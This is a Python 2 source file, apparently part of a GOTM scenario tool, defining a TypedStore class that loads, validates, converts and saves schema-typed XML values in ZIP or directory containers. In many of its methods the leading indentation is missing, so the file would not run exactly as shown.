if targetstore.version!=version and version!='':
# The version of the values file does not match the version of the target store; convert the values.
if util.verbose: print '%s "%s" has version "%s"; starting conversion to "%s".' % (packagetitle,path,version,targetstore.version)
if callback is not None: callback(0.5,'converting scenario')
tempstore = cls.fromSchemaName(version)
tempstore.loadAll(container)
if callback is None:
tempstore.convert(targetstore)
else:
tempstore.convert(targetstore,callback=lambda p,s: callback(.5+.5*p,'converting scenario: '+s))
tempstore.release()
targetstore.originalversion = version
else:
# Versions of values file and target store match; supply values to the store.
reqstorefilename = targetstore.schema.getRoot().getAttribute('packagedvaluesname')
if reqstorefilename=='': reqstorefilename = 'values.xml'
assert storefilename==reqstorefilename,'Schema-specified name for values file (%s) does not match found the values file found in the package (%s).' % (reqstorefilename,storefilename)
targetstore.setStore(storedom)
targetstore.setContainer(container)
# Store source path.
targetstore.path = container.path
# Release reference to container.
container.release()
# Report that we have finished loading.
if callback is not None: callback(1.,'done')
return targetstore
def __init__(self,schema,valueroot=None,otherstores={},adddefault=True):
util.referencedobject.__init__(self)
if not isinstance(schema,Schema): schema = Schema.create(schema)
self.schema = schema
# Get schema version
self.version = self.schema.getVersion()
self.originalversion = None
# Allow subclasses to provide custom data types
self.customdatatypes = self.getCustomDataTypes()
# Events
self.interfaces = []
self.blockedinterfaces = set()
self.otherstores = otherstores
for v in self.otherstores.itervalues(): v.addref()
# Link to original source (if any)
self.path = None
# Clear store variables
self.context = {}
self.defaultstore = None
self.defaultinterface = None
self.root = None
# Add store with default values if requested and available.
if adddefault:
defscenario = self.getDefault(self.version)
if defscenario is not None: self.setDefaultStore(defscenario,updatevisibility=False)
# Now set current values in the store
# NB: this must be done after default values are set, so that the default
# values can be taken into account when checking conditions (via setStore)
self.setStore(valueroot)
# Validation history: list of valid nodes
self.validnodes = set()
    def unlink(self):
        """Destroys the store and breaks circular references. The TypedStore object
        should not be used after this method has been called!

        Teardown order matters: the node tree is destroyed first, then the
        container, default store, linked objects, linked stores and interfaces
        are released in turn.
        """
        if self.root is not None: self.root.destroy()
        self.root = None
        # Release container
        self.setContainer(None)
        # Release default store (disconnect its interface before releasing the store itself)
        if self.defaultstore is not None:
            self.defaultstore.disconnectInterface(self.defaultinterface)
            self.defaultinterface = None
            self.defaultstore.release()
            self.defaultstore = None
        # Release any linked objects
        if 'linkedobjects' in self.context:
            for v in self.context['linkedobjects'].itervalues(): v.release()
            del self.context['linkedobjects']
        # Release any linked stores
        for v in self.otherstores.itervalues(): v.release()
        # Release all interfaces
        for i in self.interfaces: i.unlink()
        self.interfaces = []
def getDataType(self,name):
if name in self.customdatatypes: return self.customdatatypes[name]
datatype = datatypes.get(name)
assert datatype is not None,'Unknown data type "%s" requested.' % name
return datatype
    @classmethod
    def getCustomDataTypes(cls):
        """Returns a dictionary mapping data type names to custom data type
        classes. Deriving classes may override this to register their own
        types; the base implementation registers none.
        """
        return {}
    def getInterface(self,**kwargs):
        """Returns an interface to the store. Interfaces offer several facilities
        to e.g. consistently show or hide nodes with the "hidden" property, and to
        omit schema nodes that are meant for grouping only (with the "grouponly"
        attribute). Also, interfaces provide the *only* means of being notified by the
        store about changes of node value, visibility, etc.

        Keyword arguments are forwarded to the TypedStoreInterface constructor.
        Remember to call store.disconnectInterface after you are done with the interface.
        """
        return TypedStoreInterface(self,**kwargs)
def setContainer(self,container):
"""Sets the container to be used by nodes that point to external data.
This function also clears the cache with external data objects.
"""
if 'cache' in self.context:
for v in self.context['cache'].itervalues(): v.release()
del self.context['cache']
if self.context.get('container',None) is not None:
self.context['container'].release()
if container is not None: container.addref()
self.context['container'] = container
    def setStore(self,valueroot,resolvelinks=True):
        """Provides an XML DOM tree with values for the TypedStore. This
        replaces any existing values. The values can be specified as a
        path to an XML file (i.e., a string), an XML document, or an XML
        node. None may be specified instead to clear the store of all values.

        With "resolvelinks" set (default), elements carrying a "link" attribute
        are replaced in-place by the contents of the referenced XML file.
        """
        # Destroy the current node tree and release any linked objects.
        if self.root is not None: self.root.destroy()
        if 'linkedobjects' in self.context:
            for n,v in self.context['linkedobjects'].iteritems():
                assert isinstance(v,util.referencedobject), 'Linked file %s is not of type util.referencedobject.' % n
                v.release()
            del self.context['linkedobjects']
        templateroot = self.schema.getRoot()
        assert valueroot is None or isinstance(valueroot,basestring) or isinstance(valueroot,xml.dom.Node), 'Supplied value root must None, a path to an XML file, or an XML node, but is %s.' % valueroot
        valuedom,docpath = None,''
        if valueroot is None:
            # No values provided: create an empty document with the schema's root element.
            impl = xml.dom.minidom.getDOMImplementation()
            assert templateroot.hasAttribute('name'), 'Root of the schema does not have attribute "name".'
            valuedom = impl.createDocument(None, templateroot.getAttribute('name'), None)
            valueroot = valuedom.documentElement
            valueroot.setAttribute('version',self.version)
        elif isinstance(valueroot,basestring):
            # Values provided as a path to an XML file.
            docpath = valueroot
            valuedom = xml.dom.minidom.parse(valueroot)
            valueroot = valuedom.documentElement
        elif valueroot.nodeType==valueroot.DOCUMENT_NODE:
            # Values provided as an XML document node.
            valuedom = valueroot
            valueroot = valuedom.documentElement
        else:
            # Values provided as an XML element; find its owner document.
            valuedom = valueroot
            while valuedom.parentNode is not None: valuedom = valuedom.parentNode
            assert valuedom.nodeType==valuedom.DOCUMENT_NODE, 'Could not find DOM document node.'
        valuesversion = valueroot.getAttribute('version')
        assert valuesversion==self.version or valuesversion=='', 'Versions of the xml schema ("%s") and and the xml values ("%s") do not match.' % (self.version,valuesversion)
        # Parse the (optional) syntax version of the values file; default is 1.0.
        if not valueroot.hasAttribute('syntax'):
            syntax = (1,0)
        else:
            syntax = tuple(map(int,valueroot.getAttribute('syntax').split('.')))
        self.xmldocument = valuedom
        self.xmlroot = valueroot
        self.context = {}
        # Resolve links to external XML documents (if any)
        if resolvelinks:
            # Depth-first walk; linked-in content is itself scanned for further links.
            def processnode(node,refpath):
                for ch in node.childNodes:
                    if ch.nodeType==ch.ELEMENT_NODE: processnode(ch,refpath)
                if node.hasAttribute('link'):
                    linkedpath = Schema.resolveLinkedPath(node.getAttribute('link'))
                    if not os.path.isfile(linkedpath):
                        raise Exception('Linked values file "%s" does not exist.' % linkedpath)
                    childdom = xml.dom.minidom.parse(linkedpath)
                    for sourcech in childdom.documentElement.childNodes:
                        cpy = util.copyNode(sourcech,node,targetdoc=valuedom)
                        if cpy.nodeType==cpy.ELEMENT_NODE: processnode(cpy,linkedpath)
                    node.removeAttribute('link')
            processnode(self.xmlroot,docpath)
        # Build the typed node tree on top of the XML values.
        self.root = Node(self,templateroot,self.xmlroot,[],None)
        self.changed = False
        self.setContainer(None)
        # Update the visibility of all nodes - based on conditions
        # Disable individual notifications because the single "storechanged" event emitted
        # below replaces them)
        self.root.updateVisibility(recursive=True,notify=False)
        # Notify attached interface about the store change.
        self.afterStoreChange()
    def setDefaultStore(self,store,updatevisibility=True):
        """Attaches a TypedStore object with default values. The attached
        store MUST use the same schema as the store that is attached to.
        """
        assert self.version==store.version,'Version of supplied default store must match version of current store.'
        # Detach and release the previous default store (if any) first.
        if self.defaultstore is not None:
            self.defaultstore.disconnectInterface(self.defaultinterface)
            self.defaultinterface = None
            self.defaultstore.release()
        self.defaultstore = store.addref()
        self.defaultinterface = self.defaultstore.getInterface()
        # Listen for changes in the default store, so dependent nodes can react.
        self.defaultinterface.connect('afterChange',self.onDefaultChange)
        # Default nodes are used in condition checking, so changing the default store
        # requires updating the visibility of all nodes. Do so, unless explicitly said not to.
        if updatevisibility: self.root.updateVisibility(recursive=True)
def hasChanged(self):
"""Returns whether any value in the store has changed since the values
were loaded (through "setStore"), or since "resetChanged" was called.
"""
if self.changed: return True
for v in self.context.get('linkedobjects',{}).itervalues():
if isinstance(v,TypedStore) and v.hasChanged(): return True
return False
def resetChanged(self):
"""Resets the "changed" status of the store to "unchanged".
See also "hasChanged".
"""
self.changed = False
for v in self.context.get('linkedobjects',{}).itervalues():
if isinstance(v,TypedStore): v.resetChanged()
    def __getitem__(self,path):
        """Returns node at the specified path below the root of the tree.
        Equivalent to indexing the root node directly: store.root[path].
        """
        return self.root[path]
def findNode(self,path,create=False):
pathcomps = path.split('/')
node = self.root.getLocation(pathcomps,createoptional=create)
if node is None and not path.startswith('/'):
curparents = [self.root]
while curparents:
nextparents = []
for par in curparents:
for ch in par.children:
node = ch.getLocation(pathcomps,createoptional=create)
if node is not None: return node
nextparents += par.children
curparents = nextparents
return node
    def mapForeignNode(self,foreignnode):
        """Takes a node from another TypedStore that uses the same XML schema,
        and returns the equivalent node in the current store. Used for finding
        corresponding nodes in the store with defaults, among others.

        Returns None if no equivalent node exists in the current store.
        """
        indices = []
        currentnode = foreignnode
        # First we walk up the tree from the supplied foreign node, in order to find the indices
        # of all involved ancestors.
        for name in reversed(foreignnode.location):
            if not currentnode.canHaveClones():
                # This node must appear once; its index can only be zero.
                indices.insert(0,0)
            else:
                # This node can appear zero or more times. It can be identified
                # by its unique id, or if not available, by its number.
                index = currentnode.getSecondaryId()
                if index=='':
                    # No unique id: fall back to the position among same-named siblings.
                    siblings = currentnode.parent.getLocationMultiple([name])
                    for (index,sib) in enumerate(siblings):
                        if sib is currentnode: break
                    else:
                        assert False, 'Cannot find foreign node "%s" in list of its own siblings.' % name
                indices.insert(0,index)
            currentnode = currentnode.parent
        assert currentnode.parent is None, 'Location does not describe complete path to root. Currently at %s.' % currentnode
        # Now find the same location in our own store.
        # An integer index selects by position; a string index selects by unique id.
        currentnode = self.root
        for (name,index) in zip(foreignnode.location,indices):
            if isinstance(index,int):
                currentnode = currentnode.getChildByNumber(name,index)
            else:
                currentnode = currentnode.getChildById(name,index)
            if currentnode is None: return None
        return currentnode
def persist(self,callback=None):
"""Directs all custom nodes to store their custom contents in a container."""
nodes = [node for node in self.root.getNodesByType(datatypes.DataType,True) if node.valuenode is not None]
progslicer = util.ProgressSlicer(callback,len(nodes))
for node in nodes:
progslicer.nextStep(node.getText(1))
value = node.getValue()
if isinstance(value,datatypes.DataType):
value.persist(node.valuenode,self.context)
if isinstance(value,util.referencedobject): value.release()
def preparePersist(self):
"""Prepares custom nodes for being stored on disk.
This functionality is used by DataFile objects to read all
data from the source archive before it is overwritten by
an in-place save.
"""
nodes = self.root.getNodesByType(datatypes.DataType,True)
for node in nodes:
value = node.getValue()
if isinstance(value,datatypes.DataType):
value.preparePersist(node.valuenode,self.context)
if isinstance(value,util.referencedobject): value.release()
    def checkCondition(self,nodeCondition,ownernode,ownstorename=None):
        """Checks whether the condition specified by the specified XML "condition" node
        from the schema is met. The specified ownernode is used to resolve references to
        relative paths; it is the first ancestor of the condition that is of type
        element.

        Supported condition types: "eq"/"ne" (compare a referenced variable with
        a literal value) and "and"/"or" (combine nested child conditions).
        Conditions with a "source" attribute are delegated to the named sibling store.
        """
        assert nodeCondition.hasAttribute('type'), 'condition lacks "type" attribute in XML schema file.'
        src = nodeCondition.getAttribute('source')
        if src!='' and src!=ownstorename:
            # Condition references another store; delegate to it (treat as met if that store is absent).
            if src not in self.otherstores: return True
            return self.otherstores[src].checkCondition(nodeCondition,ownernode,ownstorename=src)
        condtype = nodeCondition.getAttribute('type')
        if condtype=='eq' or condtype=='ne':
            # Check for required XML attributes
            assert nodeCondition.hasAttribute('variable'), 'condition lacks "variable" attribute in XML schema file.'
            assert nodeCondition.hasAttribute('value'), 'condition lacks "value" attribute in XML schema file.'
            # Resolve the referenced variable: absolute paths from the root,
            # relative paths from the owner node's parent.
            valuepath = nodeCondition.getAttribute('variable')
            refnode = self.root
            if valuepath[0]!='/': refnode = ownernode.parent
            node = refnode[valuepath]
            assert node is not None, 'Cannot locate dependency "%s" for node "%s".' % (nodeCondition.getAttribute('variable'),ownernode)
            # Get the current value of the variable we depend on
            curvalue = node.getValue(usedefault=True)
            # If the node in question currently does not have a value, we cannot check the condition;
            # just return 'valid'.
            if curvalue is None: return True
            # Get the reference value we will compare against
            assert isinstance(curvalue,datatypes.DataTypeSimple), 'Data type of target node of condition must be DataTypeSimple, but is %s.' % (curvalue.__class__,)
            refvalue = curvalue.fromXmlString(nodeCondition.getAttribute('value'),{},node.templatenode)
            # Compare
            if condtype=='eq':
                result = (curvalue==refvalue)
            else:
                result = (curvalue!=refvalue)
            # Release the obtained value if it is reference counted.
            if isinstance(curvalue,util.referencedobject): curvalue.release()
            return result
        elif condtype=='and' or condtype=='or':
            # Check every child condition.
            for ch in nodeCondition.childNodes:
                if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='condition':
                    if self.checkCondition(ch,ownernode):
                        # OR query: one True guarantees success
                        if condtype=='or': return True
                    else:
                        # AND query: one False guarantees failure
                        if condtype=='and': return False
            # We evaluated all children. If we are doing an OR, that means all
            # children returned False: we failed, if we are doing an AND, all
            # children returned True: we succeeded.
            if condtype=='and': return True
            return False
        else:
            raise Exception('unknown condition type "%s" in XML schema file.' % condtype)
def fillMissingValues(self,skiphidden=False):
"""For every node that does not have a value, set its value to the default.
Set "skiphidden" to True to leave the value of nodes that are currently hidden
untouched.
"""
assert self.defaultstore is not None, 'Cannot fill missing values with defaults because no default store has been specified.'
if skiphidden:
for n in self.root.getEmptyNodes():
if not n.isHidden():
defvalue = n.getDefaultValue()
n.setValue(defvalue)
if isinstance(defvalue,util.referencedobject): defvalue.release()
else:
self.root.copyFrom(self.defaultstore.root,replace=replaceNever)
def clearValidationHistory(self,nodes=None):
if nodes is None:
self.validnodes.clear()
else:
self.validnodes -= set(nodes)
def updateValidationHistory(self,validity):
for node,valid in validity.iteritems():
if valid:
self.validnodes.add(node)
else:
self.validnodes.discard(node)
def validate(self,nodes=None,usedefault=True,repair=0,callback=None,usehistory=True):
# If no nodes were specified explicitly, we must validate all.
if nodes is None: nodes = self.root.getDescendants()
# Call base implementation
errors, validity = self._validate(nodes,usedefault=usedefault,repair=repair,callback=callback,usehistory=usehistory)
# Update validation history (if required)
if usehistory: self.updateValidationHistory(validity)
# Returns list of validation errors (strings)
return errors
    def _validate(self,nodes,usedefault=True,repair=0,callback=None,usehistory=True):
        """Performs the actual validation of the specified nodes.

        Returns a tuple (errors, validity): a list of error message strings,
        and a dictionary mapping each supplied node to a boolean validity flag.
        "repair" controls automatic correction of out-of-range/invalid values:
        0 = never, 1 = only for hidden nodes, 2 = always.
        Note: custom validation rules from the schema are evaluated with
        eval/exec; the schema is trusted input.
        """
        errors = []
        validity = dict([(node,True) for node in nodes])
        # Retrieve validation history (this is a set containing the nodes that
        # have been found valid in previous calls to "validate")
        if usehistory:
            oldvalids = self.validnodes
        else:
            oldvalids = set()
        # Build relevant subsets of node list.
        customnodes,selectnodes,emptynodes,lboundnodes,uboundnodes = [],[],[],[],[]
        for node in nodes:
            if not node.canHaveValue(): continue
            type = node.getValueType()
            value = node.getValue(usedefault=usedefault)
            if value is None:
                emptynodes.append(node)
            elif value.hasExpensiveValidate():
                customnodes.append(node)
            if node.templatenode.hasAttribute('hasoptions'):
                selectnodes.append(node)
            if node.templatenode.hasAttribute('minInclusive'):
                lboundnodes.append(node)
            if node.templatenode.hasAttribute('maxInclusive'):
                uboundnodes.append(node)
            if isinstance(value,util.referencedobject): value.release()
        # Find used nodes that have not been set, and lack a default value.
        for node in emptynodes:
            if node.isHidden(): continue
            validity[node] = False
            errors.append('variable "%s" has not been set.' % node.getText(1))
        # Find used file nodes that have not been supplied with data.
        visiblecustomnodes = [node for node in customnodes if not node.isHidden()]
        progslicer = util.ProgressSlicer(callback,len(visiblecustomnodes))
        for node in visiblecustomnodes:
            progslicer.nextStep('validating '+node.getText(detail=1))
            value = node.getValue(usedefault=usedefault)
            if not value.validate(node.templatenode,callback=progslicer.getStepCallback()):
                validity[node] = False
                errors.append('variable "%s" is set to an invalid value.' % node.getText(1))
            if isinstance(value,util.referencedobject): value.release()
        # Find nodes of type "select" that have been set to an invalid (non-existing) option.
        # opt: 0 = option not found, 1 = found but disabled, 2 = found and enabled.
        for node in selectnodes:
            value = node.getValue(usedefault=usedefault)
            opt = 0
            if value is not None:
                optionsroot = util.findDescendantNode(node.templatenode,['options'])
                assert optionsroot is not None, 'Schema node %s is of type "select", but lacks the "options" child node.' % node
                for ch in optionsroot.childNodes:
                    if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='option':
                        chvalue = value.fromXmlString(ch.getAttribute('value'),{},node.templatenode)
                        if value==chvalue:
                            opt = 1
                            if ch.getAttribute('disabled')!='True': opt = 2
                            break
                if opt!=2:
                    if repair==2 or (repair==1 and node.isHidden()):
                        node.setValue(node.getDefaultValue())
                    elif opt==1:
                        validity[node] = False
                        errors.append('variable "%s" is set to option "%s" (%s), which is currently disabled (perhaps not yet implemented).' % (node.getText(1),ch.getAttribute('label'),value.toPrettyString()))
                    else:
                        validity[node] = False
                        errors.append('variable "%s" is set to non-existent option %s.' % (node.getText(1),value.toPrettyString()))
            if isinstance(value,util.referencedobject): value.release()
        # Find nodes with numeric data types, and check if they respect specified ranges (if any).
        for node in lboundnodes:
            value = node.getValue(usedefault=usedefault)
            if value is not None:
                minval = value.fromXmlString(node.templatenode.getAttribute('minInclusive'),{},node.templatenode)
                if value<minval:
                    if repair==2 or (repair==1 and node.isHidden()):
                        node.setValue(minval)
                    else:
                        validity[node] = False
                        errors.append('variable "%s" is set to %s, which lies below the minimum of %s.' % (node.getText(1),value.toPrettyString(),minval.toPrettyString()))
                if isinstance(value,util.referencedobject): value.release()
        for node in uboundnodes:
            value = node.getValue(usedefault=usedefault)
            if value is not None:
                maxval = value.fromXmlString(node.templatenode.getAttribute('maxInclusive'),{},node.templatenode)
                if value>maxval:
                    if repair==2 or (repair==1 and node.isHidden()):
                        node.setValue(maxval)
                    else:
                        validity[node] = False
                        errors.append('variable "%s" is set to %s, which lies above the maximum of %s.' % (node.getText(1),value.toPrettyString(),maxval.toPrettyString()))
                if isinstance(value,util.referencedobject): value.release()
        def performTest(testnode):
            """Validates nodes against a custom validation rule provided in XML.
            """
            # Release all reference-counted values gathered for the rule's namespace.
            def cleanup():
                for value in namespace.itervalues():
                    if isinstance(value,util.referencedobject): value.release()
            # Runs the rule's "error" expressions and/or "custom" code blocks
            # against the given namespace; flags affected nodes on failure.
            def validate(namespace,affectednodes):
                try:
                    for ch in testnode.childNodes:
                        if ch.nodeType!=ch.ELEMENT_NODE: continue
                        if ch.localName=='error':
                            # Validation based on expression
                            assert ch.hasAttribute('expression'),'"expression" attribute not set on validation/rule/test node.'
                            assert ch.hasAttribute('description'),'"description" attribute not set on validation/rule/test node.'
                            if eval(ch.getAttribute('expression'),namespace):
                                raise ValidationException(ch.getAttribute('description'))
                        elif ch.localName=='custom':
                            # Validation based on custom Python code
                            for data in ch.childNodes:
                                if data.nodeType==data.CDATA_SECTION_NODE: break
                            code = compile(data.nodeValue,'<string>','exec')
                            exec code in namespace
                except ValidationException,e:
                    # Flag all affected nodes as invalid and register the error message.
                    for node in affectednodes:
                        if node in validity: validity[node] = False
                    errors.append(unicode(e))
            # Get values for all variables that this rule uses.
            namespace = {'ValidationException':ValidationException}
            valuenodes = []
            hastestablenodes = False
            anyvartype,anyvarsymbol,anyvarname = None,None,None
            for ch in testnode.childNodes:
                if ch.nodeType!=ch.ELEMENT_NODE: continue
                if ch.localName=='variable':
                    assert ch.hasAttribute('path'),'"path" attribute not set on validation/rule/variable node.'
                    path = ch.getAttribute('path')
                    name = path.split('/')[-1]
                    valuenode = self[path]
                    if valuenode.isHidden() and repair!=0:
                        # Dependent node is hidden and validation is not strict - skip this test.
                        return cleanup()
                    if validity.get(valuenode,False):
                        # Dependant node is currently being validated - this test must be executed.
                        hastestablenodes = True
                    elif valuenode not in oldvalids:
                        # Dependant node is (A) not currently validated and (B) has also not previously found to be valid.
                        # (if (B), it would have been usable to validate the value of other currently tested nodes)
                        # Skip this test.
                        return cleanup()
                    namespace[name] = valuenode.getValue(usedefault=usedefault)
                    valuenodes.append(valuenode)
                elif ch.localName=='anyvariable':
                    assert ch.hasAttribute('type'),'"type" attribute not set on validation/rule/anyvariable node.'
                    assert ch.hasAttribute('valuesymbol'),'"valuesymbol" attribute not set on validation/rule/anyvariable node.'
                    assert ch.hasAttribute('namesymbol'),'"namesymbol" attribute not set on validation/rule/anyvariable node.'
                    assert anyvartype is None,'Only one validation/rule/variable node can have the type attribute.'
                    anyvartype = ch.getAttribute('type')
                    anyvarsymbol = ch.getAttribute('valuesymbol')
                    anyvarname = ch.getAttribute('namesymbol')
            # Perform actual validation.
            if anyvartype is not None:
                # This rule applies to all nodes with a particular data type.
                for node in nodes:
                    if node.getValueType()==anyvartype and validity[node] and not (node.isHidden() and repair!=0):
                        curnamspace = dict(namespace)
                        value = node.getValue(usedefault=usedefault)
                        curnamspace[anyvarsymbol] = value
                        curnamspace[anyvarname] = node.getText(detail=1)
                        validate(curnamspace,valuenodes+[node])
                        if isinstance(value,util.referencedobject): value.release()
            else:
                # This rule applies to specific named nodes only.
                if hastestablenodes: validate(namespace,valuenodes)
            return cleanup()
        # Apply custom validation rules, if set.
        templateroot = self.schema.getRoot()
        for validationnode in templateroot.childNodes:
            if validationnode.nodeType==validationnode.ELEMENT_NODE and validationnode.localName=='validation':
                for testnode in validationnode.childNodes:
                    if testnode.nodeType==testnode.ELEMENT_NODE and testnode.localName=='test': performTest(testnode)
                break
        return errors,validity
def convert(self,target,callback=None,usedefaults=True,matchednodes=None):
"""Converts the TypedStore object to the specified target. The target may be
a version string (a new TypedStore object with the desired version will be created)
or an existing TypedStore object with the different version.
"""
if isinstance(target,basestring):
if target==self.version:
return self.addref()
target = self.fromSchemaName(target)
elif target.version==self.version:
return target
convertor = self.getSchemaInfo().getConverter(self.version,target.version)
if convertor is None:
raise Exception('No convertor available to convert version "%s" to "%s".' % (self.version,target.version))
convertor.convert(self,target,callback=callback,usedefaults=usedefaults,matchednodes=matchednodes)
return target
@classmethod
def rankSources(cls,sourceids,targetid=None,requireplatform=None):
"""Rank a set of supplied versions/identifiers according to platform (i.e. gotmgui, gotm)
and version. Rank criterion is 'closeness' (in version and platform) to the reference
targetid.
"""
if targetid is not None:
(targetplatform,targetversion) = targetid.split('-')
targetversion = versionStringToInt(targetversion)
# Decompose source ids into name and (integer) version, but only take
# source we can actually convert to the target version.
sourceinfo = []
for sid in sourceids:
if targetid is None or sid==targetid or cls.getSchemaInfo().hasConverter(sid,targetid):
(platform,version) = sid.split('-')
if requireplatform is None or requireplatform==platform:
version = versionStringToInt(version)
sourceinfo.append((platform,version,sid))
# Sort by platform (because we want the target platform first)
sourceinfoclasses = {}
for sinf in sourceinfo:
sourceinfoclasses.setdefault(sinf[0],[]).append(sinf)
# Now sort per platform according to version (higher versions first)
result = []
for sourceplatform in sourceinfoclasses.keys():
infos = sourceinfoclasses[sourceplatform]
infos.sort(cmp=lambda x,y: cmp(y[1],x[1]))
if targetid is not None and sourceplatform==targetplatform:
result = infos+result
else:
result += infos
resultids = []
for res in result: resultids.append(res[2])
return resultids
@classmethod
def canBeOpened(cls, container):
"""Returns whether the specified path can be opened as a TypedStore object."""
assert isinstance(container,datatypes.DataContainer), 'Argument must be data container object.'
files = container.listFiles()
for name in cls.getSchemaInfo().getPackagedValuesNames():
if name in files: return True
return False
    def load(self,path):
        """Loads values from an existing XML values file. This file may have been saved with the
        "save" method, or it may be taken from a container saved with the "saveAll" method.
        If the version of the XML file does not match the version of the store, conversion
        is attempted."""
        # Delegate to fromXmlFile, loading into this store rather than creating a new one.
        self.fromXmlFile(path,targetstore=self)
    def loadAll(self,path,callback=None):
        """Loads values plus associated data from the specified path. The path should point
        to a valid data container, i.e., a ZIP file, TAR/GZ file, or a directory. The source
        container typically has been saved through the "saveAll" method.
        """
        # Delegate to fromContainer, loading into this store rather than creating a new one.
        self.fromContainer(path,callback,targetstore=self)
def save(self,path):
"""Saves the values as XML, to the specified path. A file saved in this manner
might be loaded again through the "load" method."""
util.stripWhitespace(self.xmlroot)
f = codecs.open(path,'w','utf-8')
self.xmldocument.writexml(f,encoding='utf-8',addindent='\t',newl='\n')
f.close()
    def saveAll(self,path,targetversion=None,targetisdir = False,claim=True,fillmissing=False,callback=None):
        """Saves the values plus any associated data in a ZIP archive or directory.
        A file or directory created in this manner may be loaded again through the
        "loadAll" method.
        The "claim" argument decides whether the TypedStore object will, after the save,
        refer to the newly saved container for external data objects. If this is not
        set, the TypedStore will after the save still use its original container for
        external data objects.

        path:          path of the target file/directory, or a StringIO object that
                       will receive a ZIP archive.
        targetversion: if set and different from the store version, the store is
                       first converted to that version and the result is saved.
        targetisdir:   save to a directory rather than to a ZIP archive.
        fillmissing:   give unset nodes their default value before saving.
        callback:      optional progress callback.
        """
        if targetversion is not None and self.version!=targetversion:
            progslicer = util.ProgressSlicer(callback,3)
            # First convert to the target version
            progslicer.nextStep('converting to version %s' % targetversion)
            matches = {}
            tempstore = self.convert(targetversion,callback=progslicer.getStepCallback(),matchednodes=matches)
            # Now save the result of the conversion.
            progslicer.nextStep('saving')
            # NOTE: claim is intentionally not forwarded; the redirection below
            # claims the saved data for the ORIGINAL store instead.
            tempstore.saveAll(path, targetversion=targetversion, targetisdir=targetisdir, fillmissing=fillmissing, callback=progslicer.getStepCallback())
            if claim:
                # Assign the value of all saved variables with separate data to the original data store,
                # where possible. Ideally, this can be done for all variables with separate data, allowing
                # the original source file of the original data store to be released.
                progslicer.nextStep('redirecting variables with separate data to saved file.')
                callback = progslicer.getStepCallback()
                for imatch,(savednode,sourcenode) in enumerate(matches.iteritems()):
                    callback(float(imatch)/len(matches),'redirecting variable %i.' % imatch)
                    cls = sourcenode.getValueType(returnclass=True)
                    if cls is not None and issubclass(cls,util.referencedobject):
                        savedvalue = savednode.getValue()
                        if savedvalue is not None:
                            sourcenode.setValue(savedvalue)
                            savedvalue.release()
            # Release the conversion result.
            tempstore.release()
        else:
            progslicer = util.ProgressSlicer(callback,2)
            # First: fill nodes that are not set with the default value.
            if fillmissing: self.fillMissingValues()
            # Before opening the target container, allow nodes to prepare for saving to the specified path.
            # Specifically, nodes will read all files that might be overwritten into memory.
            if isinstance(path,basestring):
                self.context['targetcontainerpath'] = path
                self.preparePersist()
                del self.context['targetcontainerpath']
            # Open target container
            if isinstance(path,basestring):
                if targetisdir:
                    container = datatypes.DataContainerDirectory(path,create=True)
                else:
                    container = datatypes.DataContainerZip(path,mode='w')
            elif isinstance(path,StringIO.StringIO):
                # In-memory target: a saved StringIO cannot serve data later,
                # so claiming it makes no sense.
                container = datatypes.DataContainerZip(path,mode='w')
                claim = False
            else:
                assert False,'Supplied target must be a path to file or directory, or a StringIO object.'
            # Allow all nodes to add custom data to the target container. This can change the values
            # in the XML store, and must therefore be done before the store is added to the container.
            self.context['targetcontainer'] = container
            self.context['donotclaimtarget'] = (not claim)
            progslicer.nextStep('adding data streams')
            self.persist(progslicer.getStepCallback())
            del self.context['donotclaimtarget']
            # Add any other objects that were linked to the store by a node
            # of custom type (e.g. DataFileEx)
            for name,linkedfile in self.context.get('linkedobjects',{}).iteritems():
                assert isinstance(linkedfile,TypedStore), 'Do not know how to add linked file %s of type %s to container.' % (name,str(type(linkedfile)))
                df = datatypes.DataFileXmlNode(linkedfile.xmldocument)
                df_added = container.addItem(df,name)
                df_added.release()
                df.release()
            # Add XML store to the container
            progslicer.nextStep('saving configuration')
            df = datatypes.DataFileXmlNode(self.xmldocument)
            storefilename = self.schema.getRoot().getAttribute('packagedvaluesname')
            if storefilename=='': storefilename = 'values.xml'
            df_added = container.addItem(df,storefilename)
            df_added.release()
            df.release()
            # Make the container save all changes and then release it.
            # Note if claim=True: even though we release it, many nodes (of type "file") may now hold
            # references to data in the saved container; the container will likely not be completely
            # released. On the other hand, the original sources that were locked before saving now
            # probably will be released (the nodes do not lock them any longer).
            container.persistChanges()
            container.release()
        # Remember the path we saved to (file targets only), and mark the store clean.
        if isinstance(path,basestring):
            self.path = path
        else:
            self.path = None
        self.resetChanged()
    def toXml(self,enc='utf-8'):
        """Returns the values as an XML string, with specified encoding."""
        # Serialize the underlying DOM document directly.
        return self.xmldocument.toxml(enc)
    def toXmlDom(self,target=None):
        """Obtains a copy of the values as XML DOM tree. Values are appended to a newly
        created XML document, or to the specified target node, if present."""
        # copyNode performs the deep copy; the original tree is left untouched.
        return util.copyNode(self.xmlroot,target)
# ----------------------------------------------------------------------------------------
# Event handling
# ----------------------------------------------------------------------------------------
    def connectInterface(self,interface):
        """Connects an interface to the store. Interfaces provide events and
        can hide nodes with the hidden attribute from view, amongst others."""
        # Interfaces are simply kept in a list; events iterate over it in order.
        self.interfaces.append(interface)
def disconnectInterface(self,interface):
"""Disconnects an interface from the store. This is required to allow
the interface to go completely out of scope, and be cleaned-up."""
for i in range(len(self.interfaces)-1,-1,-1):
if self.interfaces[i] is interface:
self.interfaces.pop(i).unlink()
    def onDefaultChange(self,defaultnode,feature):
        """Called internally after a property of a node in the store with default
        values has changed. Note that its argument will be a node in the DEFAULT store,
        not in the current store! The string "feature" specifies which property has
        changed.
        """
        # Map node in default store to node in our own store.
        ownnode = self.mapForeignNode(defaultnode)
        if ownnode is None: return
        # Emit change event on all attached interfaces, skipping blocked ones.
        for i in self.interfaces:
            if i not in self.blockedinterfaces: i.onDefaultChange(ownnode,feature)
        # If the default is being used: update (visibility of) nodes that depend on the changed node.
        if not ownnode.hasValue(): self.updateDependantNodes(ownnode)
def onChange(self,node,feature):
"""Called internally after a property (e.g., value, unit) of a node has changed.
The string "feature" specifies which property has changed, e.g., "value", "unit".
"""
# Register that we changed.
self.changed = True
# Emit change event
for i in self.interfaces:
if i not in self.blockedinterfaces: i.onChange(node,feature)
# Update (visibility of) nodes that depend on the changed node.
self.updateDependantNodes(node)
    def updateDependantNodes(self,node):
        """Called internally after the value of the specified node has changed.
        This method then looks up all nodes that depend on the value of the specified
        node, and emits events if their visibility/unit/... changes in turn.
        """
